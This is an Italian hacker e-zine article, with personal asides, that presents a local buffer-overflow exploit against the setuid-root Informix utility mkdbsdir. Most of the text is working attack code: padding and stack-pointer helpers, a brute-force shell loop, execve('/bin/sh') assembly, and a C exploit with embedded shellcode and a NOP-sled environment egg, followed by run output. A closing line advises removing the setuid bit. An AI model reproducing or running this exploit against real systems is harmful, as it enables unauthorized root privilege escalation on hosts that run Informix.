==============================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--------------------[ previous ]---[ index ]---[ next ]---------------------
------------------------[ iNF0RMiX DYNAMiC SERVER BUG ]-----------------------
----------------------------------[ pIGpEN ]----------------------------------
C0NSUM0: 2 Red Bull
1 lattina di cocacola
DEDICA: alla mia prima paga andata in stronzate...
al mio lettore cd che ha perso il coperchio e per funzionare ha
bisogno di un po' di nastro adesivo sul pulsantino che rileva se il
fottuto tettuccio e' chiuso...
MUSICA ASC0TATA: One More Saturday Night per 11 volte di seguito
Grateful Dead e Around Around che con le Red Bull mi
faceva sentire in versione tecnosciamaica.
[pigpen@sp00f sbin]$ ls -al /opt/informix/bin/mkdbsdir
-rwsr-sr-x 1 root informix 892934 dic 11 1998 /opt/informix/bin/mkdbsdir
/* ---------------------------- rpt.c ------------------------------------- */
/****************************************************************************
This program simply fills out the given number of bytes. By default, the
byte is 0x41 ('A') which corresponds, on an intel CPU to "inc ecx". It
could have been better to use NOP (0x90), but this character isn't quite
printable so it is not easy to select it on the screen :-)
Anyway, "INC ECX" doesn't matter and doesn't change the code's behaviour,
so if a program branches in the middle of that, it can run till the end.
Willy
****************************************************************************/
#include <stdio.h>
main(int argc, char **argv) {
int i;
for (i=atoi(argv[1]);i;i--)
putchar(0x41); /* inc ecx */
exit(0);
}
/* ------------------------------------------------------------------------ */
/* ------------------------------ esp.c --------------------------------- */
/**************************************************************************/
/* Calculate the stack pointer value for this program. Since it doesn't */
/* vary very much from one program to another inside the same shell, the */
/* returned value can be used with a good accuracy. The output is in a */
/* binary format so that it can be concatenated to another string */
/* containing a portion of code. Warning !! The value returned mustn't */
/* have any of its 4 bytes set to 0, or it will be an 'end of string'. */
/* You can play with argv to subtract a value to the stack before giving */
/* it to stdout. */
/* */
/* Willy */
/**************************************************************************/
#include <stdio.h>
static inline getesp() {
__asm__(" movl %esp,%eax ");
}
main (int argc, char **argv) {
long unsigned esp;
int decal=0;
if (argc>1) decal=atoi(argv[1]);
esp=getesp()-decal;
fwrite(&esp,4,1,stdout);
fwrite(&esp,4,1,stdout);
}
/* ------------------------------------------------------------------------ */
/* -------------------------- tryall.mkdbsdir ----------------------------- */
# tentiamo qualkosa con il mkdbsdir utilizzando il tool di Willy Tarreau
# tarreau@aemiaif.ibp.fr
#!/bin/tcsh
# the shell name is given by 'echo -n ...' and must be exactly 7 chars here,
# or you'll have to modify the stack base for the 'LEA' instruction in the
# source 'exec.a86'.
# You can copy /usr/bin/id to /tmp and run /tmp/id instead. That's good too.
echo "PLEASE DO NOT USE THIS TO CRACK A SYSTEM, BUT JUST TO TEST YOURS\!\!\!"
set val = 100
while ($val < 3000)
echo Trying $val
/opt/informix/bin/mkdbsdir `./rpt $val;cat exec.bin;echo -n '/bin/sh';./esp 200`
@ val++
end
/* ------------------------------------------------------------------------ */
/* ----------------------------- exec.a86 --------------------------------- */
mov ecx,esp
xor eax,eax
push eax
lea ebx,[esp-7]
add esp,12
push eax
push ebx
mov edx,ecx
mov al,11
int 0x80
/* ------------------------------------------------------------------------ */
$ cc rpt.c -o rpt
$ cc esp.c -o esp
$ as86 -b exec.bin exec.a86
$ chmod +x tryall.mkdbsdir
$ ./tryall.mkdbsdir
.
.
.
Trying 122
Trying 123
Trying 124
Trying 125
Trying 126
Trying 127
Trying 128
Trying 129
Trying 130
Trying 131
Trying 132
Trying 133
Trying 134
Segmentation fault
Trying 135
Segmentation fault
Trying 136
Segmentation fault
Trying 137
Trying 138
Segmentation fault
Trying 139
Segmentation fault
Trying 140
Segmentation fault
Trying 141
Trying 142
.
.
Segmentation fault
.
.
Possibile buffer overflow... :\
/*
omsn.c
One More Saturday Night
(la canzone che stavo ascoltando mentre ho trovato sta merdata su informix)
pIGpEN/s0ftpj
" Angeli dell'era lisergica che bruciano
per l'antica e celestiale connessione
alla dinamo stellata
nel meccanismo della notte "
a padre jorma
*/
#include <stdlib.h>
#define PROG_NAME_WITH_FULL_PATH "/opt/informix/bin/mkdbsdir"
// Who made who ....
#define DEFAULT_OFFSET 0 // what here?!? :))
#define DEFAULT_BUFFER_SIZE 0 // and here?!? :))
#define DEFAULT_EGG_SIZE 0 // and here?!?! :))
// NOPEZ rulez
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
char cmd[512];
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
printf("mkdbsdir ... \n");
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
snprintf(cmd,511,"%s %s",PROG_NAME_WITH_FULL_PATH,buff);
system(cmd);
}
SOLUZIONE
Consigliabile togliere il +s fino a quando qualkosa non sara' pubblico...
Ehi gente perche' mi brucia la pancia?... Vuol dire che c'e' qualkosa dentro?
bauz
pIGpEN
--------------------[ previous ]---[ index ]---[ next ]---------------------
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
==============================================================================